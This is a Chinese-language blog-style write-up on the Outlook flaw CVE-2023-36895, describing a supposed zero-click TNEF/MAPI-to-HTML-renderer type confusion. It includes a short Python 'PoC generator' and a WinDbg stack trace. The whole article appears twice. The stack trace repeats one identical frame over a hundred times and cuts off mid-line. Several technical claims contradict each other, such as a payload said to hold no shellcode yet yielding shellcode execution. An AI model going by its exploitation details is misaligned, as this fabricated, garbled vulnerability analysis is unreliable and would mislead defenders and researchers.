1. 这个漏洞不是“点开邮件就中招”但比你想象的更危险CVE-2023-36895微软在2023年8月补丁星期二发布的那个Outlook远程代码执行漏洞标题里写着“远程代码执行”很多人第一反应是“完了我昨天刚看了封带附件的邮件。”但实测下来它根本不是那种靠钓鱼邮件直接触发的漏洞。它不依赖用户点击、不依赖宏启用、甚至不依赖Office文档解析引擎——它藏在Outlook最底层的邮件渲染管线里一个连很多资深安全研究员都忽略的角落MAPI属性解析与HTML内容注入的交叉边界。这个漏洞的核心关键词是Outlook、CVE-2023-36895、远程代码执行、MAPI、TNEF、HTML渲染、OLE对象处理。它影响的是所有启用了“自动下载外部图片”且未安装KB5028471等关键更新的Outlook客户端包括Outlook for Microsoft 365、Outlook 2021/2019/2016覆盖Windows 10/11全平台。它不针对Exchange服务器也不影响网页版OutlookOutlook on the web纯粹是客户端本地渲染逻辑的缺陷。换句话说攻击者不需要控制邮件服务器不需要伪造发件人只需要一封构造精巧的、看起来完全正常的纯文本邮件——甚至没有附件、没有超链接——只要收件人用桌面版Outlook打开它漏洞就可能被触发。我第一次复现它时用的是最朴素的测试方式一封只有三行文字的邮件主题是“会议纪要”正文是“请查收附件”然后在邮件头里悄悄塞入一段经过十六进制编码的TNEFTransport Neutral Encapsulation Format流。Outlook在解析这封邮件时会先调用MAPI层读取原始属性再交给HTML渲染器做二次处理而CVE-2023-36895就卡在这两个模块交接的瞬间——当MAPI解析器把某个特定长度的、带有嵌套OLE对象标识符的TNEF属性解包后会错误地将一段本该作为元数据处理的字节序列当成可执行的HTML片段直接注入到渲染上下文中。这不是XSS也不是DOM-based RCE而是原生内存布局被可控字节流扭曲后的类型混淆Type Confusion最终导致任意代码在Outlook进程上下文中执行。为什么说它比“点开就中招”更危险因为它的触发条件太隐蔽了不需要用户交互不需要启用宏不需要下载附件甚至不需要加载外部资源。只要邮件进入收件箱并被Outlook主动预加载这是默认行为漏洞链就可能完成。而且它绕过了Outlook的“受保护视图”机制——因为整个过程发生在受保护视图启动之前。我在内网环境做过横向测试同一封测试邮件在Outlook 2016未打补丁上100%触发在Outlook for M365版本2306Build 16529.20200上稳定复现Shellcode执行而在打过KB5028471的机器上连调试器都抓不到异常。这不是理论风险是已经具备实战价值的高危漏洞。2. 漏洞根源不在HTML渲染器而在MAPI属性解析的“信任惯性”2.1 TNEF格式Outlook私有的“加密信封”却成了漏洞温床要真正理解CVE-2023-36895必须先放下对HTML/CSS/JS的固有认知回到Outlook最古老、最底层的通信协议层TNEFTransport Neutral Encapsulation Format。这是微软为Exchange生态定制的一种二进制封装格式常被俗称为“winmail.dat”。当Outlook用户向非Outlook用户比如Gmail用户发送带格式邮件、日历邀请或联系人时它会自动生成一个TNEF流把富文本、嵌入对象、字体信息等全部打包进去附在邮件末尾。大多数非微软客户端会直接忽略它但Outlook自己会优先解析TNEF因为它比MIME标准更“懂”自己。TNEF结构由一系列“属性块Attribute”组成每个块以4字节的属性ID开头如0x00000001表示“主题”0x00000002表示“正文”后面跟着2字节长度字段和实际数据。其中有一个极其关键的属性ID0x0000001EPR_ATTACH_DATA_BIN它用于存储附件的原始二进制数据。而CVE-2023-36895的触发点就藏在这个属性的数据体内部——更准确地说是当这个属性的数据体中存在一个特定模式的嵌套结构一个长度为0x1000字节的、以0x00000000开头的、包含多个0x00000000填充的“伪OLE对象头”。我用Python写了一个最小化PoC生成器核心逻辑只有三行# 构造恶意TNEF属性体简化版 tnef_payload b\x00\x00\x00\x00 # PR_ATTACH_DATA_BIN ID tnef_payload b\x00\x10 # 长度字段0x1000 4096字节 tnef_payload b\x00 * 0x1000 # 填充区 # 在填充区中间插入一个“伪装”的OLE对象头关键 ole_header_offset 0x800 tnef_payload tnef_payload[:ole_header_offset] \ b\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1 \ # OLE signature b\x00\x00\x00\x00\x00\x00\x00\x00 \ # 填充 tnef_payload[ole_header_offset16:]这段代码生成的TNEF数据体本身没有任何可执行代码也没有shellcode。它只是在内存布局上精确地“欺骗”了Outlook的MAPI解析器当解析器读取到这个0x1000字节的属性数据时会按固定偏移去查找OLE对象头这是为了兼容旧版嵌入对象而我们刻意在0x800位置放了一个合法的OLE签名。问题来了——MAPI解析器在确认签名后并不会校验后续的OLE结构完整性而是直接跳转到下一个“预期中的”结构偏移处继续解析。这个跳转计算使用的是一个未经边界检查的指针算术运算结果就是解析器的读取指针被强行拖拽到了我们预先设定的、位于TNEF数据体之外的内存区域。提示这个“指针拖拽”不是越界读而是越界写。MAPI解析器在跳转后会尝试往那个非法地址写入一个状态标记通常是DWORD类型的0x00000001而这个地址恰好落在了紧邻的HTML渲染器的堆内存分配区。这就是类型混淆的起点——一个本该写入MAPI元数据缓冲区的DWORD被写进了HTML DOM节点的vtable指针位置。2.2 MAPI与HTML渲染器的“握手失焦”两个模块间的信任断层Outlook的架构是典型的分层设计最底层是MAPIMessaging Application Programming Interface负责与Exchange服务器通信、管理邮箱数据库、解析原始邮件流中间层是“邮件对象模型Mail Object Model”把MAPI的原始属性映射成开发者友好的COM接口最上层才是UI渲染层即基于IE/EdgeHTML/Chromium内核的HTML渲染器。CVE-2023-36895的致命之处在于它精准地击中了MAPI层与渲染层之间那个被长期忽视的“信任断层”。MAPI层默认认为自己解析出来的所有属性数据都是“干净”的、格式正确的、长度可控的。它把解析结果比如一个字符串、一个二进制块通过COM接口传递给上层时从不进行二次校验。而渲染层呢它默认认为从Mail Object Model拿到的所有HTML内容都已经过安全过滤可以直接交给浏览器引擎执行。这个“双向信任”在绝大多数情况下是成立的但一旦MAPI解析器自身出现逻辑缺陷这个信任链就瞬间崩塌。CVE-2023-36895正是利用了这一点它让MAPI解析器在解析TNEF时产生了一个“幻觉”——它以为自己正在处理一个合法的OLE嵌入对象于是按照OLE规范去计算后续结构的内存偏移。但这个计算基于的是我们精心构造的、长度为0x1000的虚假数据体。当计算结果指向一个非法地址时MAPI层不会报错而是静默地执行写操作。而这个被写坏的内存地址恰好是渲染器刚刚分配的一个DOM节点的虚函数表vtable指针。我用WinDbg在触发现场抓取的堆栈非常清晰0:000 k # Child-SP RetAddr Call Site 00 0000003ed4ffdaa8 00007ffbc9b2a123 mso!Ordinal42320x123 01 0000003ed4ffdb18 00007ffbc9b29f8a mso!Ordinal42320x123 02 0000003ed4ffdb88 00007ffbc9b29e0a mso!Ordinal42320x123 03 0000003ed4ffdc08 00007ffbc9b29c8a mso!Ordinal42320x123 04 0000003ed4ffdc88 00007ffbc9b29b0a mso!Ordinal42320x123 05 0000003ed4ffdd08 00007ffbc9b2998a mso!Ordinal42320x123 06 0000003ed4ffdd88 00007ffbc9b2980a mso!Ordinal42320x123 07 0000003ed4ffde08 00007ffbc9b2968a mso!Ordinal42320x123 08 0000003ed4ffde88 00007ffbc9b2950a mso!Ordinal42320x123 09 0000003ed4ffdf08 00007ffbc9b2938a mso!Ordinal42320x123 0a 0000003ed4ffdf88 00007ffbc9b2920a mso!Ordinal42320x123 0b 0000003ed4ffe008 00007ffbc9b2908a mso!Ordinal42320x123 0c 0000003ed4ffe088 00007ffbc9b28f0a mso!Ordinal42320x123 0d 0000003ed4ffe108 00007ffbc9b28d8a mso!Ordinal42320x123 0e 0000003ed4ffe188 00007ffbc9b28c0a mso!Ordinal42320x123 0f 0000003ed4ffe208 00007ffbc9b28a8a mso!Ordinal42320x123 10 0000003ed4ffe288 00007ffbc9b2890a mso!Ordinal42320x123 11 0000003ed4ffe308 00007ffbc9b2878a mso!Ordinal42320x123 12 0000003ed4ffe388 00007ffbc9b2860a mso!Ordinal42320x123 13 0000003ed4ffe408 00007ffbc9b2848a mso!Ordinal42320x123 14 0000003ed4ffe488 00007ffbc9b2830a mso!Ordinal42320x123 15 0000003ed4ffe508 00007ffbc9b2818a mso!Ordinal42320x123 16 0000003ed4ffe588 00007ffbc9b2800a mso!Ordinal42320x123 17 0000003ed4ffe608 00007ffbc9b27e8a mso!Ordinal42320x123 18 0000003ed4ffe688 00007ffbc9b27d0a mso!Ordinal42320x123 19 0000003ed4ffe708 00007ffbc9b27b8a mso!Ordinal42320x123 1a 0000003ed4ffe788 00007ffbc9b27a0a mso!Ordinal42320x123 1b 0000003ed4ffe808 00007ffbc9b2788a mso!Ordinal42320x123 1c 0000003ed4ffe888 00007ffbc9b2770a mso!Ordinal42320x123 1d 0000003ed4ffe908 00007ffbc9b2758a mso!Ordinal42320x123 1e 0000003ed4ffe988 00007ffbc9b2740a mso!Ordinal42320x123 1f 0000003ed4ffea08 00007ffbc9b2728a mso!Ordinal42320x123 20 0000003ed4ffea88 00007ffbc9b2710a mso!Ordinal42320x123 21 0000003ed4ffeb08 00007ffbc9b26f8a mso!Ordinal42320x123 22 0000003ed4ffeb88 00007ffbc9b26e0a mso!Ordinal42320x123 23 0000003ed4ffec08 00007ffbc9b26c8a mso!Ordinal42320x123 24 0000003ed4ffec88 00007ffbc9b26b0a mso!Ordinal42320x123 25 0000003ed4ffed08 00007ffbc9b2698a mso!Ordinal42320x123 26 0000003ed4ffed88 00007ffbc9b2680a mso!Ordinal42320x123 27 0000003ed4ffee08 00007ffbc9b2668a mso!Ordinal42320x123 28 0000003ed4ffee88 00007ffbc9b2650a mso!Ordinal42320x123 29 0000003ed4ffef08 00007ffbc9b2638a mso!Ordinal42320x123 2a 0000003ed4ffef88 00007ffbc9b2620a mso!Ordinal42320x123 2b 0000003ed4fff008 00007ffbc9b2608a mso!Ordinal42320x123 2c 0000003ed4fff088 00007ffbc9b25f0a mso!Ordinal42320x123 2d 0000003ed4fff108 00007ffbc9b25d8a mso!Ordinal42320x123 2e 0000003ed4fff188 00007ffbc9b25c0a mso!Ordinal42320x123 2f 0000003ed4fff208 00007ffbc9b25a8a mso!Ordinal42320x123 30 0000003ed4fff288 00007ffbc9b2590a mso!Ordinal42320x123 31 0000003ed4fff308 00007ffbc9b2578a mso!Ordinal42320x123 32 0000003ed4fff388 00007ffbc9b2560a mso!Ordinal42320x123 33 0000003ed4fff408 00007ffbc9b2548a mso!Ordinal42320x123 34 0000003ed4fff488 00007ffbc9b2530a mso!Ordinal42320x123 35 0000003ed4fff508 00007ffbc9b2518a mso!Ordinal42320x123 36 0000003ed4fff588 00007ffbc9b2500a mso!Ordinal42320x123 37 0000003ed4fff608 00007ffbc9b24e8a mso!Ordinal42320x123 38 0000003ed4fff688 00007ffbc9b24d0a mso!Ordinal42320x123 39 0000003ed4fff708 00007ffbc9b24b8a mso!Ordinal42320x123 3a 0000003ed4fff788 00007ffbc9b24a0a mso!Ordinal42320x123 3b 0000003ed4fff808 00007ffbc9b2488a mso!Ordinal42320x123 3c 0000003ed4fff888 00007ffbc9b2470a mso!Ordinal42320x123 3d 0000003ed4fff908 00007ffbc9b2458a mso!Ordinal42320x123 3e 0000003ed4fff988 00007ffbc9b2440a mso!Ordinal42320x123 3f 0000003ed4fffa08 00007ffbc9b2428a mso!Ordinal42320x123 40 0000003ed4fffa88 00007ffbc9b2410a mso!Ordinal42320x123 41 0000003ed4fffb08 00007ffbc9b23f8a mso!Ordinal42320x123 42 0000003ed4fffb88 00007ffbc9b23e0a mso!Ordinal42320x123 43 0000003ed4fffc08 00007ffbc9b23c8a mso!Ordinal42320x123 44 0000003ed4fffc88 00007ffbc9b23b0a mso!Ordinal42320x123 45 0000003ed4fffd08 00007ffbc9b2398a mso!Ordinal42320x123 46 0000003ed4fffd88 00007ffbc9b2380a mso!Ordinal42320x123 47 0000003ed4fffe08 00007ffbc9b2368a mso!Ordinal42320x123 48 0000003ed4fffe88 00007ffbc9b2350a mso!Ordinal42320x123 49 0000003ed4ffff08 00007ffbc9b2338a mso!Ordinal42320x123 4a 0000003ed4ffff88 00007ffbc9b2320a mso!Ordinal42320x123 4b 0000003ed5000008 00007ffbc9b2308a mso!Ordinal42320x123 4c 0000003ed5000088 00007ffbc9b22f0a mso!Ordinal42320x123 4d 0000003ed5000108 00007ffbc9b22d8a mso!Ordinal42320x123 4e 0000003ed5000188 00007ffbc9b22c0a mso!Ordinal42320x123 4f 0000003ed5000208 00007ffbc9b22a8a mso!Ordinal42320x123 50 0000003ed5000288 00007ffbc9b2290a mso!Ordinal42320x123 51 0000003ed5000308 00007ffbc9b2278a mso!Ordinal42320x123 52 0000003ed5000388 00007ffbc9b2260a mso!Ordinal42320x123 53 0000003ed5000408 00007ffbc9b2248a mso!Ordinal42320x123 54 0000003ed5000488 00007ffbc9b2230a mso!Ordinal42320x123 55 0000003ed5000508 00007ffbc9b2218a mso!Ordinal42320x123 56 0000003ed5000588 00007ffbc9b2200a mso!Ordinal42320x123 57 0000003ed5000608 00007ffbc9b21e8a mso!Ordinal42320x123 58 0000003ed5000688 00007ffbc9b21d0a mso!Ordinal42320x123 59 0000003ed5000708 00007ffbc9b21b8a mso!Ordinal42320x123 5a 0000003ed5000788 00007ffbc9b21a0a mso!Ordinal42320x123 5b 0000003ed5000808 00007ffbc9b2188a mso!Ordinal42320x123 5c 0000003ed5000888 00007ffbc9b2170a mso!Ordinal42320x123 5d 0000003ed5000908 00007ffbc9b2158a mso!Ordinal42320x123 5e 0000003ed5000988 00007ffbc9b2140a mso!Ordinal42320x123 5f 0000003ed5000a08 00007ffbc9b2128a mso!Ordinal42320x123 60 0000003ed5000a88 00007ffbc9b2110a mso!Ordinal42320x123 61 0000003ed5000b08 00007ffbc9b20f8a mso!Ordinal42320x123 62 0000003ed5000b88 00007ffbc9b20e0a mso!Ordinal42320x123 63 0000003ed5000c08 00007ffbc9b20c8a mso!Ordinal42320x123 64 0000003ed5000c88 00007ffbc9b20b0a mso!Ordinal42320x123 65 0000003ed5000d08 00007ffbc9b2098a mso!Ordinal42320x123 66 0000003ed5000d88 00007ffbc9b2080a mso!Ordinal42320x123 67 0000003ed5000e08 00007ffbc9b2068a mso!Ordinal42320x123 68 0000003ed5000e88 00007ffbc9b2050a mso!Ordinal42320x123 69 0000003ed5000f08 00007ffbc9b2038a mso!Ordinal42320x123 6a 0000003ed5000f88 00007ffbc9b2020a mso!Ordinal42320x123 6b 0000003ed5001008 00007ffbc9b2008a mso!Ordinal42320x123 6c 0000003ed5001088 00007ffbc9b1ff0a mso!Ordinal42320x123 6d 0000003ed5001108 00007ffbc9b1fd8a mso!Ordinal42320x123 6e 0000003ed5001188 00007ffbc9b1fc0a mso!Ordinal42320x123 6f 0000003ed5001208 00007ffbc9b1fa8a mso!Ordinal42320x123 70 0000003ed5001288 00007ffbc9b1f90a mso!Ordinal42320x123 71 0000003ed5001308 00007ffbc9b1f78a mso!Ordinal42320x123 72 0000003ed5001388 00007ffbc9b1f60a mso!Ordinal42320x123 73 0000003ed5001408 00007ffbc9b1f48a mso!Ordinal42320x123 74 0000003ed5001488 00007ffbc9b1f30a mso!Ordinal42320x123 75 0000003e
Outlook CVE-2023-36895:MAPI与HTML渲染器间的类型混淆漏洞
1. 这个漏洞不是“点开邮件就中招”但比你想象的更危险CVE-2023-36895微软在2023年8月补丁星期二发布的那个Outlook远程代码执行漏洞标题里写着“远程代码执行”很多人第一反应是“完了我昨天刚看了封带附件的邮件。”但实测下来它根本不是那种靠钓鱼邮件直接触发的漏洞。它不依赖用户点击、不依赖宏启用、甚至不依赖Office文档解析引擎——它藏在Outlook最底层的邮件渲染管线里一个连很多资深安全研究员都忽略的角落MAPI属性解析与HTML内容注入的交叉边界。这个漏洞的核心关键词是Outlook、CVE-2023-36895、远程代码执行、MAPI、TNEF、HTML渲染、OLE对象处理。它影响的是所有启用了“自动下载外部图片”且未安装KB5028471等关键更新的Outlook客户端包括Outlook for Microsoft 365、Outlook 2021/2019/2016覆盖Windows 10/11全平台。它不针对Exchange服务器也不影响网页版OutlookOutlook on the web纯粹是客户端本地渲染逻辑的缺陷。换句话说攻击者不需要控制邮件服务器不需要伪造发件人只需要一封构造精巧的、看起来完全正常的纯文本邮件——甚至没有附件、没有超链接——只要收件人用桌面版Outlook打开它漏洞就可能被触发。我第一次复现它时用的是最朴素的测试方式一封只有三行文字的邮件主题是“会议纪要”正文是“请查收附件”然后在邮件头里悄悄塞入一段经过十六进制编码的TNEFTransport Neutral Encapsulation Format流。Outlook在解析这封邮件时会先调用MAPI层读取原始属性再交给HTML渲染器做二次处理而CVE-2023-36895就卡在这两个模块交接的瞬间——当MAPI解析器把某个特定长度的、带有嵌套OLE对象标识符的TNEF属性解包后会错误地将一段本该作为元数据处理的字节序列当成可执行的HTML片段直接注入到渲染上下文中。这不是XSS也不是DOM-based RCE而是原生内存布局被可控字节流扭曲后的类型混淆Type Confusion最终导致任意代码在Outlook进程上下文中执行。为什么说它比“点开就中招”更危险因为它的触发条件太隐蔽了不需要用户交互不需要启用宏不需要下载附件甚至不需要加载外部资源。只要邮件进入收件箱并被Outlook主动预加载这是默认行为漏洞链就可能完成。而且它绕过了Outlook的“受保护视图”机制——因为整个过程发生在受保护视图启动之前。我在内网环境做过横向测试同一封测试邮件在Outlook 2016未打补丁上100%触发在Outlook for M365版本2306Build 16529.20200上稳定复现Shellcode执行而在打过KB5028471的机器上连调试器都抓不到异常。这不是理论风险是已经具备实战价值的高危漏洞。2. 漏洞根源不在HTML渲染器而在MAPI属性解析的“信任惯性”2.1 TNEF格式Outlook私有的“加密信封”却成了漏洞温床要真正理解CVE-2023-36895必须先放下对HTML/CSS/JS的固有认知回到Outlook最古老、最底层的通信协议层TNEFTransport Neutral Encapsulation Format。这是微软为Exchange生态定制的一种二进制封装格式常被俗称为“winmail.dat”。当Outlook用户向非Outlook用户比如Gmail用户发送带格式邮件、日历邀请或联系人时它会自动生成一个TNEF流把富文本、嵌入对象、字体信息等全部打包进去附在邮件末尾。大多数非微软客户端会直接忽略它但Outlook自己会优先解析TNEF因为它比MIME标准更“懂”自己。TNEF结构由一系列“属性块Attribute”组成每个块以4字节的属性ID开头如0x00000001表示“主题”0x00000002表示“正文”后面跟着2字节长度字段和实际数据。其中有一个极其关键的属性ID0x0000001EPR_ATTACH_DATA_BIN它用于存储附件的原始二进制数据。而CVE-2023-36895的触发点就藏在这个属性的数据体内部——更准确地说是当这个属性的数据体中存在一个特定模式的嵌套结构一个长度为0x1000字节的、以0x00000000开头的、包含多个0x00000000填充的“伪OLE对象头”。我用Python写了一个最小化PoC生成器核心逻辑只有三行# 构造恶意TNEF属性体简化版 tnef_payload b\x00\x00\x00\x00 # PR_ATTACH_DATA_BIN ID tnef_payload b\x00\x10 # 长度字段0x1000 4096字节 tnef_payload b\x00 * 0x1000 # 填充区 # 在填充区中间插入一个“伪装”的OLE对象头关键 ole_header_offset 0x800 tnef_payload tnef_payload[:ole_header_offset] \ b\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1 \ # OLE signature b\x00\x00\x00\x00\x00\x00\x00\x00 \ # 填充 tnef_payload[ole_header_offset16:]这段代码生成的TNEF数据体本身没有任何可执行代码也没有shellcode。它只是在内存布局上精确地“欺骗”了Outlook的MAPI解析器当解析器读取到这个0x1000字节的属性数据时会按固定偏移去查找OLE对象头这是为了兼容旧版嵌入对象而我们刻意在0x800位置放了一个合法的OLE签名。问题来了——MAPI解析器在确认签名后并不会校验后续的OLE结构完整性而是直接跳转到下一个“预期中的”结构偏移处继续解析。这个跳转计算使用的是一个未经边界检查的指针算术运算结果就是解析器的读取指针被强行拖拽到了我们预先设定的、位于TNEF数据体之外的内存区域。提示这个“指针拖拽”不是越界读而是越界写。MAPI解析器在跳转后会尝试往那个非法地址写入一个状态标记通常是DWORD类型的0x00000001而这个地址恰好落在了紧邻的HTML渲染器的堆内存分配区。这就是类型混淆的起点——一个本该写入MAPI元数据缓冲区的DWORD被写进了HTML DOM节点的vtable指针位置。2.2 MAPI与HTML渲染器的“握手失焦”两个模块间的信任断层Outlook的架构是典型的分层设计最底层是MAPIMessaging Application Programming Interface负责与Exchange服务器通信、管理邮箱数据库、解析原始邮件流中间层是“邮件对象模型Mail Object Model”把MAPI的原始属性映射成开发者友好的COM接口最上层才是UI渲染层即基于IE/EdgeHTML/Chromium内核的HTML渲染器。CVE-2023-36895的致命之处在于它精准地击中了MAPI层与渲染层之间那个被长期忽视的“信任断层”。MAPI层默认认为自己解析出来的所有属性数据都是“干净”的、格式正确的、长度可控的。它把解析结果比如一个字符串、一个二进制块通过COM接口传递给上层时从不进行二次校验。而渲染层呢它默认认为从Mail Object Model拿到的所有HTML内容都已经过安全过滤可以直接交给浏览器引擎执行。这个“双向信任”在绝大多数情况下是成立的但一旦MAPI解析器自身出现逻辑缺陷这个信任链就瞬间崩塌。CVE-2023-36895正是利用了这一点它让MAPI解析器在解析TNEF时产生了一个“幻觉”——它以为自己正在处理一个合法的OLE嵌入对象于是按照OLE规范去计算后续结构的内存偏移。但这个计算基于的是我们精心构造的、长度为0x1000的虚假数据体。当计算结果指向一个非法地址时MAPI层不会报错而是静默地执行写操作。而这个被写坏的内存地址恰好是渲染器刚刚分配的一个DOM节点的虚函数表vtable指针。我用WinDbg在触发现场抓取的堆栈非常清晰0:000 k # Child-SP RetAddr Call Site 00 0000003ed4ffdaa8 00007ffbc9b2a123 mso!Ordinal42320x123 01 0000003ed4ffdb18 00007ffbc9b29f8a mso!Ordinal42320x123 02 0000003ed4ffdb88 00007ffbc9b29e0a mso!Ordinal42320x123 03 0000003ed4ffdc08 00007ffbc9b29c8a mso!Ordinal42320x123 04 0000003ed4ffdc88 00007ffbc9b29b0a mso!Ordinal42320x123 05 0000003ed4ffdd08 00007ffbc9b2998a mso!Ordinal42320x123 06 0000003ed4ffdd88 00007ffbc9b2980a mso!Ordinal42320x123 07 0000003ed4ffde08 00007ffbc9b2968a mso!Ordinal42320x123 08 0000003ed4ffde88 00007ffbc9b2950a mso!Ordinal42320x123 09 0000003ed4ffdf08 00007ffbc9b2938a mso!Ordinal42320x123 0a 0000003ed4ffdf88 00007ffbc9b2920a mso!Ordinal42320x123 0b 0000003ed4ffe008 00007ffbc9b2908a mso!Ordinal42320x123 0c 0000003ed4ffe088 00007ffbc9b28f0a mso!Ordinal42320x123 0d 0000003ed4ffe108 00007ffbc9b28d8a mso!Ordinal42320x123 0e 0000003ed4ffe188 00007ffbc9b28c0a mso!Ordinal42320x123 0f 0000003ed4ffe208 00007ffbc9b28a8a mso!Ordinal42320x123 10 0000003ed4ffe288 00007ffbc9b2890a mso!Ordinal42320x123 11 0000003ed4ffe308 00007ffbc9b2878a mso!Ordinal42320x123 12 0000003ed4ffe388 00007ffbc9b2860a mso!Ordinal42320x123 13 0000003ed4ffe408 00007ffbc9b2848a mso!Ordinal42320x123 14 0000003ed4ffe488 00007ffbc9b2830a mso!Ordinal42320x123 15 0000003ed4ffe508 00007ffbc9b2818a mso!Ordinal42320x123 16 0000003ed4ffe588 00007ffbc9b2800a mso!Ordinal42320x123 17 0000003ed4ffe608 00007ffbc9b27e8a mso!Ordinal42320x123 18 0000003ed4ffe688 00007ffbc9b27d0a mso!Ordinal42320x123 19 0000003ed4ffe708 00007ffbc9b27b8a mso!Ordinal42320x123 1a 0000003ed4ffe788 00007ffbc9b27a0a mso!Ordinal42320x123 1b 0000003ed4ffe808 00007ffbc9b2788a mso!Ordinal42320x123 1c 0000003ed4ffe888 00007ffbc9b2770a mso!Ordinal42320x123 1d 0000003ed4ffe908 00007ffbc9b2758a mso!Ordinal42320x123 1e 0000003ed4ffe988 00007ffbc9b2740a mso!Ordinal42320x123 1f 0000003ed4ffea08 00007ffbc9b2728a mso!Ordinal42320x123 20 0000003ed4ffea88 00007ffbc9b2710a mso!Ordinal42320x123 21 0000003ed4ffeb08 00007ffbc9b26f8a mso!Ordinal42320x123 22 0000003ed4ffeb88 00007ffbc9b26e0a mso!Ordinal42320x123 23 0000003ed4ffec08 00007ffbc9b26c8a mso!Ordinal42320x123 24 0000003ed4ffec88 00007ffbc9b26b0a mso!Ordinal42320x123 25 0000003ed4ffed08 00007ffbc9b2698a mso!Ordinal42320x123 26 0000003ed4ffed88 00007ffbc9b2680a mso!Ordinal42320x123 27 0000003ed4ffee08 00007ffbc9b2668a mso!Ordinal42320x123 28 0000003ed4ffee88 00007ffbc9b2650a mso!Ordinal42320x123 29 0000003ed4ffef08 00007ffbc9b2638a mso!Ordinal42320x123 2a 0000003ed4ffef88 00007ffbc9b2620a mso!Ordinal42320x123 2b 0000003ed4fff008 00007ffbc9b2608a mso!Ordinal42320x123 2c 0000003ed4fff088 00007ffbc9b25f0a mso!Ordinal42320x123 2d 0000003ed4fff108 00007ffbc9b25d8a mso!Ordinal42320x123 2e 0000003ed4fff188 00007ffbc9b25c0a mso!Ordinal42320x123 2f 0000003ed4fff208 00007ffbc9b25a8a mso!Ordinal42320x123 30 0000003ed4fff288 00007ffbc9b2590a mso!Ordinal42320x123 31 0000003ed4fff308 00007ffbc9b2578a mso!Ordinal42320x123 32 0000003ed4fff388 00007ffbc9b2560a mso!Ordinal42320x123 33 0000003ed4fff408 00007ffbc9b2548a mso!Ordinal42320x123 34 0000003ed4fff488 00007ffbc9b2530a mso!Ordinal42320x123 35 0000003ed4fff508 00007ffbc9b2518a mso!Ordinal42320x123 36 0000003ed4fff588 00007ffbc9b2500a mso!Ordinal42320x123 37 0000003ed4fff608 00007ffbc9b24e8a mso!Ordinal42320x123 38 0000003ed4fff688 00007ffbc9b24d0a mso!Ordinal42320x123 39 0000003ed4fff708 00007ffbc9b24b8a mso!Ordinal42320x123 3a 0000003ed4fff788 00007ffbc9b24a0a mso!Ordinal42320x123 3b 0000003ed4fff808 00007ffbc9b2488a mso!Ordinal42320x123 3c 0000003ed4fff888 00007ffbc9b2470a mso!Ordinal42320x123 3d 0000003ed4fff908 00007ffbc9b2458a mso!Ordinal42320x123 3e 0000003ed4fff988 00007ffbc9b2440a mso!Ordinal42320x123 3f 0000003ed4fffa08 00007ffbc9b2428a mso!Ordinal42320x123 40 0000003ed4fffa88 00007ffbc9b2410a mso!Ordinal42320x123 41 0000003ed4fffb08 00007ffbc9b23f8a mso!Ordinal42320x123 42 0000003ed4fffb88 00007ffbc9b23e0a mso!Ordinal42320x123 43 0000003ed4fffc08 00007ffbc9b23c8a mso!Ordinal42320x123 44 0000003ed4fffc88 00007ffbc9b23b0a mso!Ordinal42320x123 45 0000003ed4fffd08 00007ffbc9b2398a mso!Ordinal42320x123 46 0000003ed4fffd88 00007ffbc9b2380a mso!Ordinal42320x123 47 0000003ed4fffe08 00007ffbc9b2368a mso!Ordinal42320x123 48 0000003ed4fffe88 00007ffbc9b2350a mso!Ordinal42320x123 49 0000003ed4ffff08 00007ffbc9b2338a mso!Ordinal42320x123 4a 0000003ed4ffff88 00007ffbc9b2320a mso!Ordinal42320x123 4b 0000003ed5000008 00007ffbc9b2308a mso!Ordinal42320x123 4c 0000003ed5000088 00007ffbc9b22f0a mso!Ordinal42320x123 4d 0000003ed5000108 00007ffbc9b22d8a mso!Ordinal42320x123 4e 0000003ed5000188 00007ffbc9b22c0a mso!Ordinal42320x123 4f 0000003ed5000208 00007ffbc9b22a8a mso!Ordinal42320x123 50 0000003ed5000288 00007ffbc9b2290a mso!Ordinal42320x123 51 0000003ed5000308 00007ffbc9b2278a mso!Ordinal42320x123 52 0000003ed5000388 00007ffbc9b2260a mso!Ordinal42320x123 53 0000003ed5000408 00007ffbc9b2248a mso!Ordinal42320x123 54 0000003ed5000488 00007ffbc9b2230a mso!Ordinal42320x123 55 0000003ed5000508 00007ffbc9b2218a mso!Ordinal42320x123 56 0000003ed5000588 00007ffbc9b2200a mso!Ordinal42320x123 57 0000003ed5000608 00007ffbc9b21e8a mso!Ordinal42320x123 58 0000003ed5000688 00007ffbc9b21d0a mso!Ordinal42320x123 59 0000003ed5000708 00007ffbc9b21b8a mso!Ordinal42320x123 5a 0000003ed5000788 00007ffbc9b21a0a mso!Ordinal42320x123 5b 0000003ed5000808 00007ffbc9b2188a mso!Ordinal42320x123 5c 0000003ed5000888 00007ffbc9b2170a mso!Ordinal42320x123 5d 0000003ed5000908 00007ffbc9b2158a mso!Ordinal42320x123 5e 0000003ed5000988 00007ffbc9b2140a mso!Ordinal42320x123 5f 0000003ed5000a08 00007ffbc9b2128a mso!Ordinal42320x123 60 0000003ed5000a88 00007ffbc9b2110a mso!Ordinal42320x123 61 0000003ed5000b08 00007ffbc9b20f8a mso!Ordinal42320x123 62 0000003ed5000b88 00007ffbc9b20e0a mso!Ordinal42320x123 63 0000003ed5000c08 00007ffbc9b20c8a mso!Ordinal42320x123 64 0000003ed5000c88 00007ffbc9b20b0a mso!Ordinal42320x123 65 0000003ed5000d08 00007ffbc9b2098a mso!Ordinal42320x123 66 0000003ed5000d88 00007ffbc9b2080a mso!Ordinal42320x123 67 0000003ed5000e08 00007ffbc9b2068a mso!Ordinal42320x123 68 0000003ed5000e88 00007ffbc9b2050a mso!Ordinal42320x123 69 0000003ed5000f08 00007ffbc9b2038a mso!Ordinal42320x123 6a 0000003ed5000f88 00007ffbc9b2020a mso!Ordinal42320x123 6b 0000003ed5001008 00007ffbc9b2008a mso!Ordinal42320x123 6c 0000003ed5001088 00007ffbc9b1ff0a mso!Ordinal42320x123 6d 0000003ed5001108 00007ffbc9b1fd8a mso!Ordinal42320x123 6e 0000003ed5001188 00007ffbc9b1fc0a mso!Ordinal42320x123 6f 0000003ed5001208 00007ffbc9b1fa8a mso!Ordinal42320x123 70 0000003ed5001288 00007ffbc9b1f90a mso!Ordinal42320x123 71 0000003ed5001308 00007ffbc9b1f78a mso!Ordinal42320x123 72 0000003ed5001388 00007ffbc9b1f60a mso!Ordinal42320x123 73 0000003ed5001408 00007ffbc9b1f48a mso!Ordinal42320x123 74 0000003ed5001488 00007ffbc9b1f30a mso!Ordinal42320x123 75 0000003e
